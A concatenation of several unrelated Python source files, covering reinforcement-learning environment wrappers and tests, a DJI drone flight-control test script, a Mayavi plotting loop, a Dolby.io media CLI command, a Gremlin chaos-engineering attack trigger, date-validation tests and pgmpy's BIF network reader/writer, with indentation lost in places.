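#   venv = SubprocVecEnv([partial(gym.make, 'CartPole-v1') for _ in range(4)])
#   obs = venv.reset()                                   # stacked: (4,) + obs_shape
#   actions = [venv.action_space.sample() for _ in range(4)]
#   obs, rews, dones, infos = venv.step(actions)         # workers auto-reset on done
#   venv.close()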
class Monitor(gym.Wrapper):
def __init__(self, env, info_keywords=None):
super(Monitor, self).__init__(env)
self._monitor_rewards = None
self._info_keywords = info_keywords or []
def reset(self, **kwargs):
self._monitor_rewards = []
return self.env.reset(**kwargs)
def step(self, action):
o_, r, done, info = self.env.step(action)
self._monitor_rewards.append(r)
if done:
info['episode'] = {
'r': sum(self._monitor_rewards),
'l': len(self._monitor_rewards)
}
for keyword in self._info_keywords:
info['episode'][keyword] = info[keyword]
return o_, r, done, info
class NormalizedActions(gym.ActionWrapper):
def _action(self, action):
low = self.action_space.low
high = self.action_space.high
action = low + (action + 1.0) * 0.5 * (high - low)
action = np.clip(action, low, high)
return action
def _reverse_action(self, action):
low = self.action_space.low
high = self.action_space.high
action = 2 * (action - low) / (high - low) - 1
action = np.clip(action, low, high)
return action
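# Worked example of the mapping above with assumed bounds low = -2.0, high = 2.0:
# _action(0.5) gives -2.0 + (0.5 + 1.0) * 0.5 * 4.0 = 1.0, and
# _reverse_action(1.0) recovers 2 * (1.0 - (-2.0)) / 4.0 - 1 = 0.5.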
def close_env(env):
"""
close environment or environment list
"""
try:
env.close()
except:
pass
try:
for e in env:
e.close()
except:
pass
|
the-stack_106_14775
|
# Copyright 2020,2021 Sony Corporation.
# Copyright 2021 Sony Group Corporation.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import numpy as np
import pytest
import nnabla as nn
import nnabla_rl.algorithms as A
import nnabla_rl.environments as E
class TestICML2015TRPO(object):
def setup_method(self, method):
nn.clear_parameters()
def test_algorithm_name(self):
dummy_env = E.DummyDiscreteImg()
trpo = A.ICML2015TRPO(dummy_env)
assert trpo.__name__ == 'ICML2015TRPO'
def test_run_online_training(self):
'''
Check that no error occurs when calling online training
'''
dummy_env = E.DummyDiscreteImg()
dummy_env = EpisodicEnv(dummy_env, min_episode_length=3)
config = A.ICML2015TRPOConfig(batch_size=5,
gpu_batch_size=2,
num_steps_per_iteration=5,
sigma_kl_divergence_constraint=10.0,
maximum_backtrack_numbers=2)
trpo = A.ICML2015TRPO(dummy_env, config=config)
trpo.train_online(dummy_env, total_iterations=1)
def test_run_offline_training(self):
'''
Check that no error occurs when calling offline training
'''
dummy_env = E.DummyDiscreteImg()
trpo = A.ICML2015TRPO(dummy_env)
with pytest.raises(NotImplementedError):
trpo.train_offline([], total_iterations=10)
def test_compute_eval_action(self):
dummy_env = E.DummyDiscreteImg()
trpo = A.ICML2015TRPO(dummy_env)
state = dummy_env.reset()
state = np.empty(dummy_env.observation_space.shape)
state = np.float32(state)
action = trpo.compute_eval_action(state)
assert action.shape == (1,)
def test_parameter_range(self):
with pytest.raises(ValueError):
A.ICML2015TRPOConfig(gamma=-0.1)
with pytest.raises(ValueError):
A.ICML2015TRPOConfig(num_steps_per_iteration=-1)
with pytest.raises(ValueError):
A.ICML2015TRPOConfig(sigma_kl_divergence_constraint=-0.1)
with pytest.raises(ValueError):
A.ICML2015TRPOConfig(maximum_backtrack_numbers=-0.1)
with pytest.raises(ValueError):
A.ICML2015TRPOConfig(conjugate_gradient_damping=-0.1)
def test_compute_accumulated_reward(self):
gamma = 0.99
episode_length = 3
reward_sequence = np.arange(episode_length)
gamma_seq = np.array(
[gamma**i for i in range(episode_length)])
gamma_seqs = np.zeros((episode_length, episode_length))
gamma_seqs[0] = gamma_seq
for i in range(1, episode_length):
gamma_seqs[i, i:] = gamma_seq[:-i]
expect = np.sum(reward_sequence*gamma_seqs, axis=1)
dummy_envinfo = E.DummyContinuous()
icml2015_trpo = A.ICML2015TRPO(dummy_envinfo)
accumulated_reward = icml2015_trpo._compute_accumulated_reward(
reward_sequence, gamma)
assert expect == pytest.approx(accumulated_reward.flatten())
def test_compute_accumulated_reward_raise_value_error(self):
gamma = 0.99
episode_length = 3
reward_sequence = np.arange(episode_length).reshape((1, -1))
dummy_envinfo = E.DummyContinuous()
icml2015_trpo = A.ICML2015TRPO(dummy_envinfo)
with pytest.raises(ValueError):
icml2015_trpo._compute_accumulated_reward(reward_sequence, gamma)
if __name__ == "__main__":
from testing_utils import EpisodicEnv
pytest.main()
else:
from ..testing_utils import EpisodicEnv
|
the-stack_106_14777
|
import time
from dji_asdk_to_python.products.aircraft import Aircraft
from dji_asdk_to_python.flight_controller.virtual_stick.flight_control_data import FlightControlData
from dji_asdk_to_python.flight_controller.virtual_stick.control_mode import VerticalControlMode
APP_IP = "192.168.100.210"
drone = Aircraft(APP_IP)
fc = drone.getFlightController()
res = fc.setVirtualStickModeEnabled(True)
print("res", res)
vsm = fc.getVirtualStickModeEnabled()
print("VirtualStickModeEnabled is %s" % vsm)
fcd = FlightControlData(pitch=0, roll=0, yaw=0, vertical_throttle=1)
fc.startTakeoff()
time.sleep(7)  # give the takeoff a few seconds to complete
# Throttle test
""" for i in range(2):
fcd.setVerticalThrottle(fcd.getVerticalThrottle() * -1)
print(fcd)
time.sleep(1)
for i in range(10):
fc.sendVirtualStickFlightControlData(fcd)
time.sleep(0.1)
time.sleep(2)
fcd.setVerticalThrottle(fcd.getVerticalThrottle() * -1)
print(fcd)
time.sleep(1)
for i in range(10):
fc.sendVirtualStickFlightControlData(fcd)
time.sleep(0.1)
time.sleep(2) """
# Yaw test
fcd.setVerticalThrottle(0)
fcd.setYaw(20)
for i in range(2):
fcd.setYaw(fcd.getYaw() * -1)
print(fcd)
for i in range(10):
fc.sendVirtualStickFlightControlData(fcd)
time.sleep(0.1)
time.sleep(2)
fcd.setYaw(fcd.getYaw() * -1)
print(fcd)
for i in range(10):
fc.sendVirtualStickFlightControlData(fcd)
time.sleep(0.1)
time.sleep(2)
# Pitch test
fcd.setYaw(0)
fcd.setPitch(1)
for i in range(2):
fcd.setPitch(fcd.getPitch() * -1)
print(fcd)
for i in range(10):
fc.sendVirtualStickFlightControlData(fcd)
time.sleep(0.1)
time.sleep(2)
fcd.setPitch(fcd.getPitch() * -1)
print(fcd)
for i in range(10):
fc.sendVirtualStickFlightControlData(fcd)
time.sleep(0.1)
time.sleep(2)
# Roll test
fcd.setPitch(0)
fcd.setRoll(1)
for i in range(2):
fcd.setRoll(fcd.getRoll() * -1)
print(fcd)
for i in range(10):
fc.sendVirtualStickFlightControlData(fcd)
time.sleep(0.1)
time.sleep(2)
fcd.setRoll(fcd.getRoll() * -1)
print(fcd)
for i in range(10):
fc.sendVirtualStickFlightControlData(fcd)
time.sleep(0.1)
time.sleep(2)
fc.setVerticalControlMode(VerticalControlMode.VELOCITY)
# Using callback does not block execution
def printVerticalMode(vertical_mode):
print("aircraft vertical mode is %s" % vertical_mode)
fc.getVerticalControlMode(callback=printVerticalMode)
fc.setVerticalControlMode(VerticalControlMode.POSITION)
fc.getVerticalControlMode(callback=printVerticalMode)
fcd.setYaw(0)
fcd.setRoll(0)
fcd.setPitch(0)
for i in range(3):
fcd.setVerticalThrottle(3)
print(fcd)
for i in range(10):
fc.sendVirtualStickFlightControlData(fcd)
time.sleep(0.1)
time.sleep(3)
fcd.setVerticalThrottle(6)
print(fcd)
for i in range(10):
fc.sendVirtualStickFlightControlData(fcd)
time.sleep(0.1)
time.sleep(3)
print(fc.getVerticalControlMode(callback=printVerticalMode))
fc.setVirtualStickModeEnabled(False)
fc.startLanding()
|
the-stack_106_14778
|
from mayavi import mlab
from mayavi.mlab import *
from mayavi.mlab import savefig
import pylab
import tables
def getMesh(grid):
xlo, ylo, zlo = grid._v_attrs.vsLowerBounds
xup, yup, zup = grid._v_attrs.vsUpperBounds
nx, ny, nz = grid._v_attrs.vsNumCells
x, y, z = pylab.mgrid[xlo:xup:nx*1j, ylo:yup:ny*1j, zlo:zup:nz*1j]
return x, y, z
for i in range(0,22):
print ("Working on frame %d ... " % i)
fh = tables.openFile("s445-euler-rt-3d_q_%d.h5" % i)
grid = fh.root.StructGrid
nx, ny, nz = grid._v_attrs.vsNumCells
x, y, z = getMesh(grid)
rho = fh.root.StructGridField[:,:,:,0]
rhoSd = pipeline.scalar_field(x,y,z,rho)
# add various figures
    pipeline.image_plane_widget(rhoSd,
                                plane_orientation='x_axes',
                                slice_index=nx // 2)
    pipeline.image_plane_widget(rhoSd,
                                plane_orientation='z_axes',
                                slice_index=nz // 2)
outline()
pipeline.iso_surface(rhoSd, contours=[1.5], opacity=0.75)
roll(0.0)
savefig('s445-euler-rt_rho_%05d.png' % i, magnification=2.0)
close()
fh.close()
|
the-stack_106_14780
|
"""
Command: Input / Output
"""
from argparse import _SubParsersAction, Namespace
from dolbyio_rest_apis.media import io
def command_name() -> str:
return 'io'
def add_arguments(sub_parsers: _SubParsersAction) -> None:
parser = sub_parsers.add_parser(command_name(), help='Input / Output')
parser.add_argument(
'--api_key',
help='Your API Key.',
required=True,
type=str
)
parser.add_argument(
'--dlb_url',
help='''
The `url` should be in the form `dlb://object-key` where the object-key can be any alpha-numeric string.
The object-key is unique to your account API Key so there is no risk of collision with other users.
''',
required=True,
type=str
)
parser.add_argument(
'--file',
help='File to upload.',
required=True,
type=str
)
sub_parsers_io = parser.add_subparsers(dest='sub_command')
sub_parsers_io.add_parser('upload', help='Upload a file')
sub_parsers_io.add_parser('download', help='Download a file')
async def execute_command(args: Namespace) -> None:
api_key = args.api_key
dlb_url = args.dlb_url
file = args.file
if args.sub_command == 'upload':
upload_url = await io.get_upload_url(
api_key=api_key,
dlb_url=dlb_url
)
print(f'Upload URL: {upload_url}')
await io.upload_file(
upload_url=upload_url,
file_path=file
)
print(f'File uploaded to {dlb_url}')
elif args.sub_command == 'download':
await io.download_file(
api_key=api_key,
dlb_url=dlb_url,
file_path=file
)
print(f'File saved at {file}')
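# Hypothetical invocations of this sub-command (the entry-point module name
# below is an assumption; the wrapper that wires up these argparse sub-parsers
# is not part of this file):
#
#     python -m dolbyio_cli io --api_key $KEY --dlb_url dlb://in/file.mp3 --file in.mp3 upload
#     python -m dolbyio_cli io --api_key $KEY --dlb_url dlb://in/file.mp3 --file out.mp3 download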
|
the-stack_106_14781
|
from datetime import datetime
from goodboy.errors import Error
from goodboy.messages import type_name
from goodboy.types.dates import DateTime
from tests.conftest import assert_errors, validate_value_has_odd_year
def test_accepts_datetime_type():
schema = DateTime()
good_value = datetime(1985, 10, 26, 9, 0, 0)
assert schema(good_value) == good_value
def test_rejects_non_datetime_type():
schema = DateTime()
bad_value = "1985-10-26T09:00:00"
with assert_errors(
[Error("unexpected_type", {"expected_type": type_name("datetime")})]
):
schema(bad_value)
def test_type_casting_accepts_good_input_with_default_format():
schema = DateTime()
good_input = "1985-10-26T09:00:00"
value = datetime(1985, 10, 26, 9, 0, 0)
assert schema(good_input, typecast=True) == value
def test_type_casting_rejects_bad_input_with_default_format():
schema = DateTime()
bad_input = "1985/10/26 09:00:00"
with assert_errors([Error("invalid_datetime_format")]):
schema(bad_input, typecast=True)
def test_type_casting_accepts_good_input_with_custom_format():
schema = DateTime(format="%Y/%m/%d %H:%M:%S")
good_input = "1985/10/26 09:00:00"
value = datetime(1985, 10, 26, 9, 0, 0)
assert schema(good_input, typecast=True) == value
def test_type_casting_rejects_bad_input_with_custom_format():
schema = DateTime(format="%Y/%m/%d %H:%M:%S")
bad_input = "1985-10-26T09:00:00"
with assert_errors([Error("invalid_datetime_format")]):
schema(bad_input, typecast=True)
def test_type_casting_accepts_good_input_with_custom_format_from_context():
schema = DateTime(format="should_not_be_used")
good_input = "1985/10/26 09:00:00"
value = datetime(1985, 10, 26, 9, 0, 0)
context = {"date_format": "%Y/%m/%d %H:%M:%S"}
assert schema(good_input, typecast=True, context=context) == value
def test_type_casting_rejects_bad_input_with_custom_format_from_context():
schema = DateTime(format="should_not_be_used")
bad_input = "1985-10-26T09:00:00"
context = {"date_format": "%Y/%m/%d %H:%M:%S"}
with assert_errors([Error("invalid_datetime_format")]):
schema(bad_input, typecast=True, context=context)
def test_type_casting_accepts_date_values():
schema = DateTime()
good_input = datetime(1985, 10, 26, 9, 0, 0)
assert schema(good_input, typecast=True) == good_input
def test_type_casting_rejects_non_string_values():
schema = DateTime()
bad_input = 42
with assert_errors(
[Error("unexpected_type", {"expected_type": type_name("datetime")})]
):
schema(bad_input, typecast=True)
def test_accepts_allowed_value():
schema = DateTime(
allowed=[datetime(1985, 10, 26, 9, 0, 0), datetime(2015, 10, 21, 7, 28, 0)]
)
assert schema(datetime(1985, 10, 26, 9, 0, 0)) == datetime(1985, 10, 26, 9, 0, 0)
assert schema(datetime(2015, 10, 21, 7, 28, 0)) == datetime(2015, 10, 21, 7, 28, 0)
def test_none_check_precedes_allowed():
schema = DateTime(
allowed=[datetime(1985, 10, 26, 9, 0, 0), datetime(2015, 10, 21, 7, 28, 0)],
allow_none=True,
)
assert schema(None) is None
def test_rejects_not_allowed_value():
allowed = [datetime(1985, 10, 26, 9, 0, 0), datetime(2015, 10, 21, 7, 28, 0)]
schema = DateTime(allowed=allowed)
with assert_errors([Error("not_allowed", {"allowed": allowed})]):
schema(datetime(1955, 11, 12, 6, 38, 00))
def test_ignores_rules_when_value_has_unexpected_type():
schema = DateTime(rules=[validate_value_has_odd_year])
with assert_errors(
[Error("unexpected_type", {"expected_type": type_name("datetime")})]
):
schema("oops")
def test_options_type_casting():
option_val = datetime(2000, 1, 1, 0, 0, 0)
option_str = "2000-01-01T00:00:00"
schema_val = DateTime(
earlier_than=option_val,
earlier_or_equal_to=option_val,
later_than=option_val,
later_or_equal_to=option_val,
allowed=[option_val],
)
schema_str = DateTime(
earlier_than=option_str,
earlier_or_equal_to=option_str,
later_than=option_str,
later_or_equal_to=option_str,
allowed=[option_str],
)
assert schema_val == schema_str
|
the-stack_106_14782
|
# -*- coding: utf-8 -*-
from functools import wraps
import json
import os
from typing import Any, Dict
from logzero import logger
import requests
from chaoslib.exceptions import FailedActivity
from chaoslib.types import Secrets
from chaosgremlin import auth, GREMLIN_BASE_URL
__all__ = ["attack"]
def attack(command: Dict[str, Any], target: Dict[str, Any],
labels: Dict[str, Any] = None, tags: Dict[str, Any] = None,
secrets: Secrets = None):
"""
    Triggers an attack (for instance a CPU attack) on a target host. Please refer to Gremlin's
documentation for the meaning of each argument. The `secrets` argument is
a mapping which must have the following keys: `email`, `password` and
`org_name`.
The function returns the identifier of the attack or raises
:exc:`FailedActivity` if the authentication failed and
when the attack could not be started.
.. seealso:: https://www.gremlin.com/docs/
"""
session = auth(**secrets)
url = "{base}/attacks/new".format(base=GREMLIN_BASE_URL)
r = requests.post(
url,
headers={
"Authorization": session["header"]
},
json={
"command": command,
"target": target,
"labels": labels,
"tags": tags
})
if r.status_code != 201:
raise FailedActivity(
"Gremlin attack failed: {m}".format(m=r.text))
result = r.text
logger.debug("attack submitted succesfully: {r}".format(r=result))
return result
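# Illustrative call (a sketch only, not from this module): the exact shape of
# the `command` and `target` payloads accepted by the Gremlin API is an
# assumption here -- consult the Gremlin documentation for the real schema.
#
#     attack(
#         command={"type": "cpu", "args": ["-c", "1", "-l", "60"]},
#         target={"type": "Random"},
#         secrets={"email": "user@example.com", "password": "...", "org_name": "my-org"},
#     )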
|
the-stack_106_14783
|
import collections
import re
from copy import copy
from itertools import product
from string import Template
import numpy as np
from joblib import Parallel, delayed
from pyparsing import (
CharsNotIn,
Group,
OneOrMore,
Optional,
Suppress,
Word,
ZeroOrMore,
alphanums,
cppStyleComment,
nums,
printables,
)
from pgmpy.factors.discrete import TabularCPD
from pgmpy.models import BayesianNetwork
class BIFReader(object):
"""
Base class for reading network file in bif format
"""
def __init__(self, path=None, string=None, include_properties=False, n_jobs=-1):
"""
Initializes a BIFReader object.
Parameters
----------
path : file or str
File of bif data
string : str
String of bif data
include_properties: boolean
If True, gets the properties tag from the file and stores in graph properties.
n_jobs: int (default: -1)
Number of jobs to run in parallel. `-1` means use all processors.
Examples
--------
# dog-problem.bif file is present at
# http://www.cs.cmu.edu/~javabayes/Examples/DogProblem/dog-problem.bif
>>> from pgmpy.readwrite import BIFReader
>>> reader = BIFReader("bif_test.bif")
<pgmpy.readwrite.BIF.BIFReader object at 0x7f2375621cf8>
>>> model = reader.get_model()
"""
if path:
with open(path, "r") as network:
self.network = network.read()
elif string:
self.network = string
else:
raise ValueError("Must specify either path or string")
self.n_jobs = n_jobs
self.include_properties = include_properties
if '"' in self.network:
# Replacing quotes by spaces to remove case sensitivity like:
# "Dog-Problem" and Dog-problem
# or "true""false" and "true" "false" and true false
self.network = self.network.replace('"', " ")
if "/*" in self.network or "//" in self.network:
self.network = cppStyleComment.suppress().transformString(
self.network
) # removing comments from the file
(
self.name_expr,
self.state_expr,
self.property_expr,
) = self.get_variable_grammar()
self.probability_expr, self.cpd_expr = self.get_probability_grammar()
self.network_name = self.get_network_name()
self.variable_names = self.get_variables()
self.variable_states = self.get_states()
if self.include_properties:
self.variable_properties = self.get_property()
self.variable_parents = self.get_parents()
self.variable_cpds = self.get_values()
self.variable_edges = self.get_edges()
def get_variable_grammar(self):
"""
A method that returns variable grammar
"""
        # Defining an expression for a valid word
word_expr = Word(alphanums + "_" + "-")
word_expr2 = Word(initChars=printables, excludeChars=["{", "}", ",", " "])
name_expr = Suppress("variable") + word_expr + Suppress("{")
state_expr = ZeroOrMore(word_expr2 + Optional(Suppress(",")))
# Defining a variable state expression
variable_state_expr = (
Suppress("type")
+ Suppress(word_expr)
+ Suppress("[")
+ Suppress(Word(nums))
+ Suppress("]")
+ Suppress("{")
+ Group(state_expr)
+ Suppress("}")
+ Suppress(";")
)
# variable states is of the form type description [args] { val1, val2 }; (comma may or may not be present)
property_expr = (
Suppress("property") + CharsNotIn(";") + Suppress(";")
        )  # Creating an expr to find the property tag
return name_expr, variable_state_expr, property_expr
def get_probability_grammar(self):
"""
A method that returns probability grammar
"""
        # Creating a valid word expression for probability; it is of the format
        # var1 | var2, var3 or var1 var2 var3 or simply var1
word_expr = (
Word(alphanums + "-" + "_")
+ Suppress(Optional("|"))
+ Suppress(Optional(","))
)
word_expr2 = Word(
initChars=printables, excludeChars=[",", ")", " ", "("]
) + Suppress(Optional(","))
# creating an expression for valid numbers, of the format
        # 1.00 or 1 or 0.00 or 9.8e-5 etc
num_expr = Word(nums + "-" + "+" + "e" + "E" + ".") + Suppress(Optional(","))
probability_expr = (
Suppress("probability")
+ Suppress("(")
+ OneOrMore(word_expr)
+ Suppress(")")
)
optional_expr = Suppress("(") + OneOrMore(word_expr2) + Suppress(")")
probab_attributes = optional_expr | Suppress("table")
cpd_expr = probab_attributes + OneOrMore(num_expr)
return probability_expr, cpd_expr
def variable_block(self):
start = re.finditer("variable", self.network)
for index in start:
end = self.network.find("}\n", index.start())
yield self.network[index.start() : end]
def probability_block(self):
start = re.finditer("probability", self.network)
for index in start:
end = self.network.find("}\n", index.start())
yield self.network[index.start() : end]
def get_network_name(self):
"""
Returns the name of the network
Example
---------------
>>> from pgmpy.readwrite import BIFReader
        >>> reader = BIFReader("bif_test.bif")
        >>> reader.get_network_name()
'Dog-Problem'
"""
start = self.network.find("network")
end = self.network.find("}\n", start)
# Creating a network attribute
network_attribute = Suppress("network") + Word(alphanums + "_" + "-") + "{"
network_name = network_attribute.searchString(self.network[start:end])[0][0]
return network_name
def get_variables(self):
"""
Returns list of variables of the network
Example
-------------
>>> from pgmpy.readwrite import BIFReader
>>> reader = BIFReader("bif_test.bif")
>>> reader.get_variables()
['light-on','bowel_problem','dog-out','hear-bark','family-out']
"""
variable_names = []
for block in self.variable_block():
name = self.name_expr.searchString(block)[0][0]
variable_names.append(name)
return variable_names
def get_states(self):
"""
Returns the states of variables present in the network
Example
-----------
>>> from pgmpy.readwrite import BIFReader
>>> reader = BIFReader("bif_test.bif")
>>> reader.get_states()
{'bowel-problem': ['true','false'],
'dog-out': ['true','false'],
'family-out': ['true','false'],
'hear-bark': ['true','false'],
'light-on': ['true','false']}
"""
variable_states = {}
for block in self.variable_block():
name = self.name_expr.searchString(block)[0][0]
variable_states[name] = list(self.state_expr.searchString(block)[0][0])
return variable_states
def get_property(self):
"""
Returns the property of the variable
Example
-------------
>>> from pgmpy.readwrite import BIFReader
>>> reader = BIFReader("bif_test.bif")
>>> reader.get_property()
{'bowel-problem': ['position = (335, 99)'],
'dog-out': ['position = (300, 195)'],
'family-out': ['position = (257, 99)'],
'hear-bark': ['position = (296, 268)'],
'light-on': ['position = (218, 195)']}
"""
variable_properties = {}
for block in self.variable_block():
name = self.name_expr.searchString(block)[0][0]
properties = self.property_expr.searchString(block)
variable_properties[name] = [y.strip() for x in properties for y in x]
return variable_properties
def get_parents(self):
"""
Returns the parents of the variables present in the network
Example
--------
>>> from pgmpy.readwrite import BIFReader
>>> reader = BIFReader("bif_test.bif")
>>> reader.get_parents()
{'bowel-problem': [],
'dog-out': ['family-out', 'bowel-problem'],
'family-out': [],
'hear-bark': ['dog-out'],
'light-on': ['family-out']}
"""
variable_parents = {}
for block in self.probability_block():
names = self.probability_expr.searchString(block.split("\n")[0])[0]
variable_parents[names[0]] = names[1:]
return variable_parents
def _get_values_from_block(self, block):
names = self.probability_expr.searchString(block)
var_name, parents = names[0][0], names[0][1:]
cpds = self.cpd_expr.searchString(block)
# Check if the block is a table.
if bool(re.search(".*\\n[ ]*table .*\n.*", block)):
arr = np.array([float(j) for i in cpds for j in i])
arr = arr.reshape(
(
len(self.variable_states[var_name]),
arr.size // len(self.variable_states[var_name]),
)
)
else:
arr_length = np.prod([len(self.variable_states[var]) for var in parents])
arr = np.zeros((len(self.variable_states[var_name]), arr_length))
values_dict = {}
for prob_line in cpds:
states = prob_line[: len(parents)]
vals = [float(i) for i in prob_line[len(parents) :]]
values_dict[tuple(states)] = vals
for index, combination in enumerate(
product(*[self.variable_states[var] for var in parents])
):
arr[:, index] = values_dict[combination]
return var_name, arr
def get_values(self):
"""
Returns the CPD of the variables present in the network
Example
--------
>>> from pgmpy.readwrite import BIFReader
>>> reader = BIFReader("bif_test.bif")
>>> reader.get_values()
{'bowel-problem': np.array([[0.01],
[0.99]]),
'dog-out': np.array([[0.99, 0.97, 0.9, 0.3],
[0.01, 0.03, 0.1, 0.7]]),
'family-out': np.array([[0.15],
[0.85]]),
'hear-bark': np.array([[0.7, 0.01],
[0.3, 0.99]]),
'light-on': np.array([[0.6, 0.05],
[0.4, 0.95]])}
"""
cpd_values = Parallel(n_jobs=self.n_jobs)(
delayed(self._get_values_from_block)(block)
for block in self.probability_block()
)
variable_cpds = {}
for var_name, arr in cpd_values:
variable_cpds[var_name] = arr
return variable_cpds
def get_edges(self):
"""
Returns the edges of the network
Example
--------
>>> from pgmpy.readwrite import BIFReader
>>> reader = BIFReader("bif_test.bif")
>>> reader.get_edges()
[['family-out', 'light-on'],
['family-out', 'dog-out'],
['bowel-problem', 'dog-out'],
['dog-out', 'hear-bark']]
"""
edges = [
[value, key]
for key in self.variable_parents.keys()
for value in self.variable_parents[key]
]
return edges
def get_model(self, state_name_type=str):
"""
Returns the Bayesian Model read from the file/str.
Parameters
----------
state_name_type: int, str or bool (default: str)
The data type to which to convert the state names of the variables.
Example
----------
>>> from pgmpy.readwrite import BIFReader
>>> reader = BIFReader("bif_test.bif")
>>> reader.get_model()
<pgmpy.models.BayesianNetwork.BayesianNetwork object at 0x7f20af154320>
"""
try:
model = BayesianNetwork()
model.add_nodes_from(self.variable_names)
model.add_edges_from(self.variable_edges)
model.name = self.network_name
tabular_cpds = []
for var in sorted(self.variable_cpds.keys()):
values = self.variable_cpds[var]
sn = {
p_var: list(map(state_name_type, self.variable_states[p_var]))
for p_var in self.variable_parents[var]
}
sn[var] = list(map(state_name_type, self.variable_states[var]))
cpd = TabularCPD(
var,
len(self.variable_states[var]),
values,
evidence=self.variable_parents[var],
evidence_card=[
len(self.variable_states[evidence_var])
for evidence_var in self.variable_parents[var]
],
state_names=sn,
)
tabular_cpds.append(cpd)
model.add_cpds(*tabular_cpds)
if self.include_properties:
for node, properties in self.variable_properties.items():
for prop in properties:
prop_name, prop_value = map(
lambda t: t.strip(), prop.split("=")
)
model.nodes[node][prop_name] = prop_value
return model
except AttributeError:
raise AttributeError(
"First get states of variables, edges, parents and network name"
)
class BIFWriter(object):
"""
Base class for writing BIF network file format
"""
def __init__(self, model):
"""
Initialise a BIFWriter Object
Parameters
----------
model: BayesianNetwork Instance
Examples
---------
>>> from pgmpy.readwrite import BIFWriter
>>> from pgmpy.utils import get_example_model
>>> asia = get_example_model('asia')
>>> writer = BIFWriter(asia)
>>> writer
<writer_BIF.BIFWriter at 0x7f05e5ea27b8>
>>> writer.write_bif('asia.bif')
"""
if not isinstance(model, BayesianNetwork):
raise TypeError("model must be an instance of BayesianNetwork")
self.model = model
if not self.model.name:
self.network_name = "unknown"
else:
self.network_name = self.model.name
self.variable_states = self.get_states()
self.property_tag = self.get_properties()
self.variable_parents = self.get_parents()
self.tables = self.get_cpds()
def BIF_templates(self):
"""
Create template for writing in BIF format
"""
network_template = Template("network $name {\n}\n")
        # The property tag may or may not be present in the model, and since the number of
        # properties can be more than one, they are substituted according to the format; otherwise left empty
variable_template = Template(
"""variable $name {
type discrete [ $no_of_states ] { $states };
$properties}\n"""
)
property_template = Template(" property $prop ;\n")
        # $variable_ here is the name of the variable; the underscore is kept for clarity
probability_template = Template(
"""probability ( $variable_$separator_$parents ) {
table $values ;
}\n"""
)
conditional_probability_template_total = Template(
"""probability ( $variable_$separator_$parents ) {
$values
}\n"""
)
conditional_probability_template = Template(""" ( $state ) $values;\n""")
return (
network_template,
variable_template,
property_template,
probability_template,
conditional_probability_template_total,
conditional_probability_template,
)
def __str__(self):
"""
Returns the BIF format as string
"""
(
network_template,
variable_template,
property_template,
probability_template,
conditional_probability_template_total,
conditional_probability_template,
) = self.BIF_templates()
network = ""
network += network_template.substitute(name=self.network_name)
variables = self.model.nodes()
for var in sorted(variables):
no_of_states = str(len(self.variable_states[var]))
states = ", ".join(self.variable_states[var])
if not self.property_tag[var]:
properties = ""
else:
properties = ""
for prop_val in self.property_tag[var]:
properties += property_template.substitute(prop=prop_val)
network += variable_template.substitute(
name=var,
no_of_states=no_of_states,
states=states,
properties=properties,
)
for var in sorted(variables):
if not self.variable_parents[var]:
parents = ""
separator = ""
cpd = ", ".join(map(str, self.tables[var]))
network += probability_template.substitute(
variable_=var, separator_=separator, parents=parents, values=cpd
)
else:
parents_str = ", ".join(self.variable_parents[var])
separator = " | "
cpd = self.model.get_cpds(var)
cpd_values_transpose = cpd.get_values().T
parent_states = product(
*[cpd.state_names[var] for var in cpd.variables[1:]]
)
all_cpd = ""
for index, state in enumerate(parent_states):
all_cpd += conditional_probability_template.substitute(
state=", ".join(map(str, state)),
values=", ".join(map(str, cpd_values_transpose[index, :])),
)
network += conditional_probability_template_total.substitute(
variable_=var,
separator_=separator,
parents=parents_str,
values=all_cpd,
)
return network
def get_variables(self):
"""
Add variables to BIF
Returns
-------
list: a list containing names of variable
Example
-------
>>> from pgmpy.readwrite import BIFReader, BIFWriter
>>> model = BIFReader('dog-problem.bif').get_model()
>>> writer = BIFWriter(model)
>>> writer.get_variables()
['bowel-problem', 'family-out', 'hear-bark', 'light-on', 'dog-out']
"""
variables = self.model.nodes()
return variables
def get_states(self):
"""
Add states to variable of BIF
Returns
-------
dict: dict of type {variable: a list of states}
Example
-------
>>> from pgmpy.readwrite import BIFReader, BIFWriter
>>> model = BIFReader('dog-problem.bif').get_model()
>>> writer = BIFWriter(model)
>>> writer.get_states()
{'bowel-problem': ['bowel-problem_0', 'bowel-problem_1'],
'dog-out': ['dog-out_0', 'dog-out_1'],
'family-out': ['family-out_0', 'family-out_1'],
'hear-bark': ['hear-bark_0', 'hear-bark_1'],
'light-on': ['light-on_0', 'light-on_1']}
"""
variable_states = {}
cpds = self.model.get_cpds()
for cpd in cpds:
variable = cpd.variable
variable_states[variable] = []
for state in cpd.state_names[variable]:
variable_states[variable].append(str(state))
return variable_states
def get_properties(self):
"""
Add property to variables in BIF
Returns
-------
dict: dict of type {variable: list of properties }
Example
-------
>>> from pgmpy.readwrite import BIFReader, BIFWriter
>>> model = BIFReader('dog-problem.bif').get_model()
>>> writer = BIFWriter(model)
>>> writer.get_properties()
{'bowel-problem': ['position = (335, 99)'],
'dog-out': ['position = (300, 195)'],
'family-out': ['position = (257, 99)'],
'hear-bark': ['position = (296, 268)'],
'light-on': ['position = (218, 195)']}
"""
variables = self.model.nodes()
property_tag = {}
for variable in sorted(variables):
properties = self.model.nodes[variable]
properties = collections.OrderedDict(sorted(properties.items()))
property_tag[variable] = []
for prop, val in properties.items():
property_tag[variable].append(str(prop) + " = " + str(val))
return property_tag
def get_parents(self):
"""
Add the parents to BIF
Returns
-------
dict: dict of type {variable: a list of parents}
Example
-------
>>> from pgmpy.readwrite import BIFReader, BIFWriter
>>> model = BIFReader('dog-problem.bif').get_model()
>>> writer = BIFWriter(model)
>>> writer.get_parents()
{'bowel-problem': [],
'dog-out': ['bowel-problem', 'family-out'],
'family-out': [],
'hear-bark': ['dog-out'],
'light-on': ['family-out']}
"""
cpds = self.model.get_cpds()
variable_parents = {}
for cpd in cpds:
variable_parents[cpd.variable] = cpd.variables[1:]
return variable_parents
def get_cpds(self):
"""
Adds tables to BIF
Returns
-------
dict: dict of type {variable: array}
Example
-------
>>> from pgmpy.readwrite import BIFReader, BIFWriter
